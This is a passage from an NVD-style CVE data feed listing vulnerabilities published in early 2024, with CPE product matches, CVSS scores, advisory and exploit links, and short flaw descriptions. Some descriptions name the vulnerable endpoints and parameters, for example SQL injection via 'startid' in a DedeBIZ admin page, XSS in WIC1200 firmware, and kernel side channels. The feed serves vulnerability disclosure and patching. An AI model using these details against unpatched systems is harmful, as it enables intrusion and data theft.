"4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:gnutls:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T12:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0554", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious javascript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:xantech:wic1200_firmware:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:xantech:wic1200:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0555", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in. This vulnerability is possible due to the lack of propper CSRF token implementation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:xantech:wic1200_firmware:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:xantech:wic1200:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.0, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.1, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0556", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Weak Cryptography for Passwords vulnerability has been detected on WIC200 affecting version 1.1. This vulnerability allows a remote user to intercept the traffic and retrieve the credentials from another user and decode it in base64 allowing the attacker to see the credentials in plain text." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:xantech:wic1200_firmware:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:xantech:wic1200:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0557", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md", "name" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md", "name" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250725", "name" : "https://vuldb.com/?ctiid.250725", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250725", "name" : "https://vuldb.com/?ctiid.250725", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250725", "name" : "https://vuldb.com/?id.250725", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250725", "name" : "https://vuldb.com/?id.250725", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dedebiz:dedebiz:6.3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0558", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md", "name" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md", "name" : "https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250726", "name" : "https://vuldb.com/?ctiid.250726", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250726", "name" : "https://vuldb.com/?ctiid.250726", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250726", "name" : "https://vuldb.com/?id.250726", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250726", "name" : "https://vuldb.com/?id.250726", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dedebiz:dedebiz:6.3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0559", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://research.cleantalk.org/cve-2024-0559/", "name" : "https://research.cleantalk.org/cve-2024-0559/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://research.cleantalk.org/cve-2024-0559/", "name" : "https://research.cleantalk.org/cve-2024-0559/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/", "name" : "https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/", "name" : "https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inisev:enhanced_text_widget:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.6.6 ", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-11T18:15Z", "lastModifiedDate" : "2025-04-01T15:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0560", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0560", "name" : "https://access.redhat.com/security/cve/CVE-2024-0560", "refsource" : "", "tags" : [ "Mitigation", "Vendor Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0560", "name" : "https://access.redhat.com/security/cve/CVE-2024-0560", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258456", "name" : "RHBZ#2258456", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258456", "name" : "RHBZ#2258456", "refsource" : "", "tags" : [ "Mitigation", "Vendor Advisory" ] }, { "url" : "https://github.com/3scale/APIcast/pull/1438", "name" : "https://github.com/3scale/APIcast/pull/1438", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/3scale/APIcast/pull/1438", "name" : "https://github.com/3scale/APIcast/pull/1438", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in 3Scale, when used with Keycloak 15 (or RHSSO 7.5.0) and superiors. When the auth_type is use_3scale_oidc_issuer_endpoint, the Token Introspection policy discovers the Token Introspection endpoint from the token_introspection_endpoint field, but the field was removed on RH-SSO 7.5. As a result, the policy doesn't inspect tokens, it determines that all tokens are valid." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:3scale:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:redhat:keycloak:15.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-28T17:15Z", "lastModifiedDate" : "2025-01-21T18:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0561", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/", "name" : "https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/", "name" : "https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inisev:ultimate_posts_widget:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-11T18:15Z", "lastModifiedDate" : "2025-05-01T00:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0562", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0412", "name" : "RHSA-2024:0412", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0412", "name" : "RHSA-2024:0412", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0562", "name" : "https://access.redhat.com/security/cve/CVE-2024-0562", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0562", "name" : "https://access.redhat.com/security/cve/CVE-2024-0562", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258475", "name" : "RHBZ#2258475", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258475", "name" : "RHBZ#2258475", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/", "name" : "https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/", "name" : "https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.0:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.0:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.16", "versionEndExcluding" : "5.19.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.15", "versionEndExcluding" : "5.15.164", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0563", "ASSIGNER" : "security@m-files.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://product.m-files.com/security-advisories/cve-2024-0563/", "name" : "https://product.m-files.com/security-advisories/cve-2024-0563/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/", "name" : "https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-02-23T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0564", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-203" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0564", "name" : "https://access.redhat.com/security/cve/CVE-2024-0564", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0564", "name" : "https://access.redhat.com/security/cve/CVE-2024-0564", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513", "name" : "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513", "name" : "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258514", "name" : "RHBZ#2258514", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258514", "name" : "RHBZ#2258514", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://link.springer.com/conference/wisa", "name" : "https://link.springer.com/conference/wisa", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://link.springer.com/conference/wisa", "name" : "https://link.springer.com/conference/wisa", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://wisa.or.kr/accepted", "name" : "https://wisa.or.kr/accepted", "refsource" : "", "tags" : [ "Not Applicable" ] }, { "url" : "https://wisa.or.kr/accepted", "name" : "https://wisa.or.kr/accepted", "refsource" : "", "tags" : [ "Not Applicable" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is \"max page sharing=256\", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's \"max page share\". Through these operations, the attacker can leak the victim's page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.4.0-96.119", "versionEndIncluding" : "5.15.0-58", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-30T15:15Z", "lastModifiedDate" : "2024-11-25T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0565", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-191" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:1188", "name" : "RHSA-2024:1188", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1404", "name" : "RHSA-2024:1404", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1532", "name" : "RHSA-2024:1532", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1533", "name" : "RHSA-2024:1533", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1607", "name" : 